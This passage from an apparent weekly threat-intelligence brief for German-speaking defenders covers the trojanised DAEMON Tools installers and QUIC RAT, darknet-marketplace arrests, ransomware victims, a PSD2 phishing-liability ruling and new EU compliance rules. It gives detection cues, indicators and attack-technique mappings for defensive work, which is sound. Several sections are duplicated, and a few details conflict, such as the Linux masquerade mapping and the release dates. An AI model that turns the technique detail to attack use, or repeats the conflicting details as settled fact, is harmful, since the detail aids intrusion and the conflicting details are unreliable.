reproduction): monitor for JSE/SCR/PIF droppers carrying Base64-encoded payloads; flag scheduled tasks under generic browser-update names (e.g. ChromeCheck, EdgeCheck); inspect VSCode tunnel authentications via GitHub for unrecognised tunnel names; alert on Rust-compiled PE images loading from non-standard paths and on outbound *.trycloudflare.com connections that don't match a developer's legitimate tunnel-use profile. Technique class: T1071.001 Application-layer C2 via web protocol + T1090.002 External Proxy + T1053.005 Scheduled Task. [SINGLE-SOURCE] — only Kaspersky GReAT carries this depth; included because Kaspersky is HIGH-reliability for North Korea-nexus reporting and the technical detail is defender-actionable. Marked at edge of the 72 h developing window (Securelist publication 2026-05-14, ~62 h before run start).

Owe Martin Andresen, a 49-year-old German national alleged by US and German prosecutors to be "Speedstepper" — the lead administrator of the Dream Market darknet narcotics marketplace from 2013 until its 2019 voluntary shutdown — was arrested in Germany on 2026-05-07 and publicly identified on 2026-05-13–14 (The Record, 2026-05-14 · US DEA, 2026-05-13). The action was a coordinated multi-agency operation: the Bundeskriminalamt and the Zentrale Kriminalinspektion Oldenburg for the German side, with the US DEA Miami, IRS-CI Cyber Crimes Unit, FBI, USPIS, and HSI executing in parallel. A US federal grand jury in the Northern District of Georgia had returned a sealed indictment on 2026-01-13 charging Andresen with six counts of international concealment money laundering and six counts of concealment money laundering (240 years aggregate maximum); German charges carry up to five years. The OPSEC failures that closed the seven-year gap were operational, not technical: in late 2022 Andresen allegedly accessed Dream Market's dormant cryptocurrency wallets — an action only the holder of the original private keys could perform — and consolidated the contents into a single wallet, providing prosecutors with a definitive on-chain link; and in August 2023 he used an Atlanta-based cryptocurrency-to-physical-asset service to purchase gold bars that were shipped directly to his home address in Germany, providing the geographic and identity link. At arrest, German authorities seized approximately USD 1.7 million in gold bars, USD 23,000 in cash, and approximately USD 1.2 million in cryptocurrency. Three Dream Market co-administrators ("Oxymonster", "KITT3N", "GOWRON") had been convicted previously. The case is operationally interesting to public-sector intelligence liaisons because it illustrates that long-tail attribution of darknet operators is increasingly driven by post-cessation financial behaviour — wallet reactivation, regulated-service touchpoints, physical-asset conversion — rather than on-platform OPSEC; the seven-year delay between the marketplace's closure and the arrest is the operational signal.

The German Bundeskriminalamt (BKA) and Frankfurt's Central Office for Combating Internet Crime (ZIT), with Spanish National Police support, arrested a 35-year-old German national at his residence in Mallorca on a European Arrest Warrant on 2026-05-08 and shut down the relaunched Crimenetwork (Bundeskriminalamt press release — Deutscher Betreiber von "Crimenetwork" auf Mallorca verhaftet, 2026-05-08; Help Net Security, 2026-05-11). Crimenetwork was the dominant German-language darknet marketplace; the platform was originally taken down in December 2024, and a new operator rebuilt the infrastructure under the same branding shortly afterwards. The rebooted platform reached ~22,000 users and 100+ vendors and brokered stolen data, narcotics, forged documents and illegal services in BTC / LTC / XMR for an estimated €3.6 million in commissions and vendor fees before being seized. Investigators recovered approximately €194,000 in assets and substantial user/transaction data, which the BKA states will drive a wave of follow-on prosecutions — the press release explicitly frames the seized infrastructure data as the operational value, not the headline arrest.

Defender takeaway: The DACH-region credential / payment-card / forged-document inventory cycle on Crimenetwork is now a known-historical artefact for the next 12–24 months — the seized vendor and buyer ledgers will resurface in attribution reports and breach-notification timelines. For Swiss / German / Austrian SOCs running credential-monitoring services, expect a downstream wave of leaked-credential validations once the BKA dataset reaches partner CERTs. The case also reinforces a structural point for German-speaking-market threat models: when an EU-wide darknet platform is dismantled, the replacement is typically a same-branding relaunch on residual customer trust rather than a forum migration — the rebrand interval has now compressed to weeks.

For any NIS2 / KRITIS-DachG / CER essential-entity SOC: measure SIEM / XDR coverage by hostname inventory rather than by sensor-licence count. The South Staffordshire 5% finding is what the ICO judged as inadequate for a water OES; with NIS2 transposition in force across the EU and KRITIS-DachG live in Germany, regulators are now armed with a concrete UK precedent for what "proportionate technical measures" failure looks like in court. Practical first step: pull a list of every Active Directory–joined host from AD; cross-reference against the EDR / SIEM source list; flag the delta. The delta is what the ICO would call the gap.

Two European political / media targets in the week: Mediaworks Kft (Hungary) — World Leaks claimed 8.5 TB of exfiltrated data including payroll, contracts, and internal editorial communications; Mediaworks confirmed "a significant amount of illegally obtained data may have come into the possession of unauthorized persons"; no public regulator notification announcement at window close (The Record, 2026-05-04 · daily 2026-05-06). Die Linke (Germany) — German federal political party confirmed Qilin ransomware encryption and 1.5 TB exfiltration; state DPA notified; no public ransom figure (heise online — covered in daily, 2026-05-08). Two distinct operators (data-theft-only WorldLeaks versus encrypt-and-exfiltrate Qilin), shared targeting of politically significant European entities. The defender lesson: data-theft-only operators defeat backup-centric ransomware defences entirely — effective detection requires egress monitoring and data-loss-prevention tooling capable of alerting on large-volume exfiltration before the attacker goes public on a leak site.

Official DAEMON Tools Lite Windows installers (versions 12.5.0.2421 → 12.5.0.2434) were trojanised on the Disc Soft vendor distribution server from 8 April to 5 May 2026, with malicious installers maintaining the authentic AVB Disc Soft code-signing certificate. The campaign deployed three stages: a .NET information collector (envchk.exe) for host fingerprinting deployed broadly across more than 100 countries (Germany, France, Spain, and Italy appear explicitly in first-stage victim telemetry); a shellcode-based backdoor; and QUIC RAT — a C++ implant supporting HTTP / UDP / TCP / WebSocket / QUIC / HTTP/3 C2 channels — selectively deployed to approximately twelve targets in government, scientific, manufacturing, and retail sectors in Russia, Belarus, and Thailand per Kaspersky. Chinese-language strings in the information collector suggest a Chinese-speaking actor; no formal attribution to a named group. The C2 domain was registered 2026-03-27 — approximately two weeks before the first trojanised installer (2026-04-08) — confirming pre-planned operation. Disc Soft acknowledged 2026-05-05, released clean version 12.6.0.2445, resolved the distribution compromise within 12 hours (Kaspersky Securelist · The Record, 2026-05-06 · BleepingComputer, 2026-05-06 · Help Net Security, 2026-05-06 · daily 2026-05-07 and 2026-05-09 UPDATE). Defender takeaway: audit endpoints for DAEMON Tools Lite versions 12.5.0.2421 – 12.5.0.2434 installed on any government, scientific, or manufacturing endpoint since 8 April 2026; hunt for envchk.exe, unsigned processes injected into notepad.exe or conhost.exe, and outbound UDP 443 (QUIC) to non-sanctioned destinations; Sysmon EID 1 with parent-image filters surfaces post-injection activity. The pattern — selective QUIC-channel deployment behind broad-targeting reconnaissance staging — is the operationally important detail; it explains why telemetry hit-rate alone underestimates targeted-actor presence.

On 2026-04-22 the Landgericht Berlin II (Civil Chamber 38, case 38 O 293/25; not yet final pending appeal) ordered Deutsche Apotheker- und Ärztebank (Apobank) to reimburse €218,000+ in losses from a sophisticated phishing attack combining forged physical bank letters, manipulated online banking interfaces, and spoofed-number phone calls. The court rejected gross-negligence defences, finding the fraud too sophisticated to attribute to customer failure; critically, the ruling found the bank's fraud-detection systems failed to act on a clear anomaly visible in bank-side logs — the new device registration and first login originated from materially different IP addresses and ISPs. The court treated this as an obligation under Germany's PSD2 implementation: an IP-based behavioural analytics duty triggering a strong-customer-authentication challenge when registration and first-use IPs diverge (heise online, 2026-05-08 · ilex Rechtsanwälte case summary · daily 2026-05-09). Defender takeaway: EU and Swiss financial-sector and public-sector digital-service providers should expect this trend of liability lines moving toward the service provider when fraud signals are present in server-side telemetry but not acted on. The defensive engineering implication is concrete: register-new-device and first-login IP / ISP comparison is now a regulatory expectation in PSD2 jurisdictions, not just a best-practice control.

GTIG's Europe data-leak landscape analysis (published 2026-04-15, first covered 2026-05-07) is the second-tier annual reference that materially affects DACH defender posture and merits cross-week synthesis: Germany is the primary European ransomware target with SAFEPAY accounting for 25% of German data-leak-site posts (76 victims claimed in 2025), Qilin tripling operational tempo in Germany during Q3 2025 with 13 additional German victims posted by early 2026 (Die Linke this week confirms continued activity into 2026-W19), and Sarcoma actively recruiting German network access via criminal forums since November 2024. 96% of German ransomware victims are organisations with fewer than 5,000 employees — exploited both directly and as supply-chain footholds into larger enterprises and government contractors; legal and professional services rose to 14% of victims — explicitly relevant to Swiss / EU public-sector procurement officers since those firms hold client IP and M&A intelligence. GTIG attributes part of the shift to AI-enabled high-quality localisation eroding the language-barrier protection that historically benefited non-English-speaking markets (daily 2026-05-07).

Current state: GTIG's Europe data-leak landscape (§ 6) documented Qilin tripling Q3 2025 operational tempo in Germany; Die Linke (Germany federal political party) confirmed Qilin encryption with 1.5 TB exfiltrated (covered 2026-05-08), state DPA notified — Qilin German activity continues into 2026-Q2. No public-claim shift or victim-list expansion beyond Die Linke this week. Outstanding question: whether Qilin's targeting of political and civil-society organisations expands into other 2026 EU election cycles.

The Apobank phishing-liability ruling (LG Berlin II, case 38 O 293/25, 2026-04-22; not yet final pending appeal) explicitly places liability on the bank for failing to act on IP / ISP divergence between new-device registration and first login — interpreted under Germany's PSD2 implementation as an obligation to deploy IP-based behavioural analytics and trigger strong-customer-authentication challenges when registration and first-use IPs diverge (heise online, 2026-05-08 · daily 2026-05-09). What changed: even if not yet final on appeal, the ruling is the most explicit case-law statement to date in a PSD2 jurisdiction that failure to act on a fraud signal present in bank-side telemetry shifts liability to the service provider. What defenders need to do differently: EU and Swiss financial-sector and public-sector digital-service providers should treat register-new-device and first-login IP / ISP comparison as a regulatory expectation rather than best practice — and should specifically ensure the SCA-step-up signal can be raised in real time on this anomaly. Anticipate other EU member-state PSD2 jurisdictions following the LG Berlin II reasoning.

Germany's KRITIS-DachG (Act to Strengthen Physical Resilience of Critical Installations), implementing EU CER Directive 2022/2557, entered into force in late March 2026 following Bundesrat approval on 6 March 2026 (Luther Lawfirm, 2026-04-10 · Morrison Foerster European Digital Compliance, 2026-05-01). The Act establishes the first cross-sectoral physical and organisational resilience framework covering energy, transport, healthcare, water, finance, and — for the first time — municipal waste disposal and aspects of public administration. Registration deadline 17 July 2026 (or within three months of later qualification). Post-registration obligations cascade over nine–ten months: risk assessments every four years covering natural / technical / sabotage / cross-border scenarios, resilience plans, and 24-hour incident reporting to a joint BSI/BBK reporting point. Fines for non-compliance: up to €100,000 for registration/cooperation failures; up to €1,000,000 for concealing non-registration status; up to €200,000 for missing resilience evidence or plan. Key ambiguity: the BMI implementing ordinance defining which specific services and installations qualify as "critical" is not yet published, leaving scope uncertain for borderline operators. What defenders need to do differently: German public-sector and critical-sector organisations need to self-assess KRITIS-DachG applicability before 17 July; ISG-style 24-hour reporting obligation now applies to physical as well as cyber incidents; Swiss entities with German subsidiaries operating in scope sectors are directly affected. Cross-references NIS2 and BSI Act obligations — the three frameworks overlap operationally and require coordinated incident-response runbook design.

On 19 March 2026 the European Data Protection Board launched its annual Coordinated Enforcement Framework (CEF) action, with 25 participating DPAs across Europe examining compliance with GDPR Articles 12, 13, and 14 — the transparency and information obligations requiring controllers to clearly disclose what data is processed, on what legal basis, and for what purposes. Unlike prior CEF years (right of access 2024, right to erasure 2025), transparency obligations are broadly applicable to every data-processing controller in every sector, making this year's sweep unusually wide (EDPB, 2026-03-19). Participating DPAs include Austria, Denmark, Germany (Brandenburg, Niedersachsen), Finland, France, Greece, Spain, Italy, Malta, Slovenia, Slovakia. Each DPA may conduct either formal enforcement actions or lighter-touch fact-finding exercises; findings consolidated into an aggregated EDPB report in H2 2026. What defenders need to do differently: audit privacy notices — website cookie banners, HR processing notices, CCTV notices, AI-generated data notices — against the Articles 12–14 checklist; given the EU's 2026 AI Act obligations also arriving in August, transparency failures in AI-generated personal-data processing are likely to attract enforcement attention. CEF findings frequently trigger follow-on national investigations at DPAs that identify outliers. Single-source national-CERT carve-out applies (EDPB is the primary disclosing authority for its own programme).

Since 8 April 2026, trojanised versions of DAEMON Tools Lite (12.5.0.2421 through 12.5.0.2434) have been distributed from the legitimate vendor website, signed with valid AVB Disc Soft digital certificates. Kaspersky researchers documented a three-stage architecture: an initial profiling component (envchk.exe) fingerprinting the system; a minimalistic backdoor enabling remote command execution on selected targets; and QUIC RAT, an advanced implant that injects into notepad.exe and conhost.exe, supports C2 over QUIC (evading proxy inspection), and implements shell execution, file management, process injection, keylogging, SOCKS proxy, and TCP tunnelling (Kaspersky Securelist, 2026-05-05 updated 2026-05-08 · Help Net Security, 2026-05-06). Several thousand installation attempts were observed across ~100 countries; Germany, France, Spain, and Italy are among the top victim countries. Targeted QUIC RAT deployment was limited to approximately a dozen machines in government, scientific, manufacturing, and retail sectors — indicating selective activation consistent with intelligence-collection objectives. Artefacts including Chinese-language strings suggest a Chinese-speaking actor; no formal attribution has been made. The clean release is version 12.6.0.2445 (released 2026-05-06).

MITRE ATT&CK coverage: T1195.002 Supply Chain Compromise; T1036.004 Masquerade Task or Service (kworker/ksoftirqd masquerade); T1573.002 Asymmetric Cryptography / QUIC; T1055 Process Injection.

Defender takeaway: Audit endpoints for DAEMON Tools Lite versions 12.5.0.2421–12.5.0.2434; check for envchk.exe, unsigned processes injected into notepad.exe or conhost.exe, and outbound QUIC (UDP 443) to non-sanctioned destinations. Sysmon EID 1 with parent-process image path filters for notepad.exe or conhost.exe spawning child processes will surface post-injection activity. Update to 12.6.0.2445.

On 2026-04-22 the Landgericht Berlin II (Civil Chamber 38, case 38 O 293/25; not yet final pending appeal) ordered Deutsche Apotheker- und Ärztebank (Apobank) to reimburse €218,000+ in losses from a sophisticated phishing attack that combined forged physical bank letters, manipulated online banking interfaces, and spoofed-number phone calls (heise online, 2026-05-08 · ilex Rechtsanwälte — case summary, 2026-05). The court rejected gross-negligence defences, finding the fraud was too sophisticated to attribute to customer failure. Critically, the ruling found the bank's fraud-detection systems failed to act on a clear anomaly visible in bank-side logs: the new device registration and first login originated from materially different IP addresses and ISPs. The court treated this as an obligation under Germany's PSD2 implementation — specifically, a duty to apply IP-based behavioural analytics and trigger a strong-customer-authentication challenge when registration and first-use IPs diverge. For EU/Swiss financial-sector and public-sector digital-service providers: this reinforces the trend of courts placing authentication-failure liability on service providers when fraud signals are present in server-side telemetry but not acted on.

The German federal party Die Linke confirmed in April 2026 that the Qilin ransomware group (also known as Agenda, a Rust-based RaaS platform known for double extortion) encrypted and exfiltrated its systems, with the gang claiming 1.5 TB of internal data. The party's data protection officer notified the responsible Landesdatenschutzbehörde (state DPA). Die Linke issued a victim statement acknowledging operational disruption; no ransom figure has been publicly disclosed. Qilin has targeted political parties and civil-society organisations across Western Europe since 2023. This breach is approximately four weeks old but has not been previously covered in this brief series.

(First covered 2026-05-06.) The Instructure/Canvas breach has expanded significantly in scope. The threat actor now claims access affecting 330 institutions across six countries, threatening to publish 16 million student and staff records. SURF (the Dutch National Research and Education Network) has confirmed 44 Dutch institutions among the victims. The attacker posted portal defacements at multiple universities and established a 2026-05-12 extortion deadline for ransom payment. Canvas services were taken offline again on 2026-05-07 for emergency patching. European DPAs in the Netherlands and Germany have opened preliminary inquiries into notification timing. Institutions using Canvas should assess GDPR Article 33/34 breach notification obligations before the May 12 deadline.